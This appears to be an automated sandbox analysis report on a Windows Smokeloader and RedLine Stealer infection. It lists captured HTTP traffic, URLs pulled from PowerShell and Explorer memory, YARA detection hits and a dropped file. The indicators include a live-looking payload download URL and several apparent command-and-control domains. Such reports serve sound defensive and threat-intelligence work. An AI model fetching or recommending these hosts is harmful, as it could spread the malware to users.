2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:37:07 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:37:07 GMT
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 14:37:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:37:33 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 14:37:33 GMT
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DEC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1315560529.00000194DEEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1315560529.00000194DD8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru/download/svc.exe
      Source: explorer.exe, 0000000E.00000003.2271704425.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2499939595.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 0000000E.00000002.2508785780.000000000C40E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2503025898.00000000092A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271648841.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2507163228.000000000BFD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2510145156.000000000E980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.php
      Source: explorer.exe, 0000000E.00000002.2508785780.000000000C40E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271648841.000000000C40D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.phpings6QP
      Source: explorer.exe, 0000000E.00000003.2271704425.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2499939595.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 0000000E.00000003.2271704425.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2499939595.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 0000000E.00000003.2271814403.0000000009013000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://fwtilsrhssulldop.com/
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DF2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194EDA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: explorer.exe, 0000000E.00000003.2271704425.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2499939595.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 0000000E.00000003.2271765227.000000000C4F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271584733.000000000C4B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ooxywteyveq.com/
      Source: explorer.exe, 0000000E.00000003.2271765227.000000000C4F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271584733.000000000C4B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ooxywteyveq.com/application/x-www-form-urlencodedMozilla/5.0
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: explorer.exe, 0000000E.00000002.2509240753.000000000C560000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271403404.000000000C55E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271209149.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rfcqeahtpbrxjuy.net/
      Source: explorer.exe, 0000000E.00000002.2509240753.000000000C560000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271403404.000000000C55E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271209149.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rfcqeahtpbrxjuy.net/application/x-www-form-urlencodedMozilla/5.0
      Source: explorer.exe, 0000000E.00000002.2501271006.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1407973981.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1407494868.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DD8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: explorer.exe, 0000000E.00000002.2501943788.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/
      Source: explorer.exe, 0000000E.00000002.2507163228.000000000C1E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2272656102.000000000C1E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/index.php.
      Source: explorer.exe, 0000000E.00000002.2501943788.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/l
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: powershell.exe, 00000004.00000002.1314664931.00000194DB975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: explorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DD8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: explorer.exe, 0000000E.00000000.1408331897.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 0000000E.00000003.2271814403.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008DAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 0000000E.00000002.2501943788.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 0000000E.00000000.1406417153.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2499201257.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
      Source: explorer.exe, 0000000E.00000000.1408331897.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
      Source: explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
      Source: powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: explorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DE4FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
      Source: powershell.exe, 00000004.00000002.1315560529.00000194DF2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194EDA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: explorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 0000000E.00000000.1408331897.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
      Source: explorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 0000000E.00000002.2499201257.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000F.00000002.1688128712.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000C.00000002.1426518576.00000000008DE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000F.00000002.1688048281.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\oBuf.exeJump to dropped file
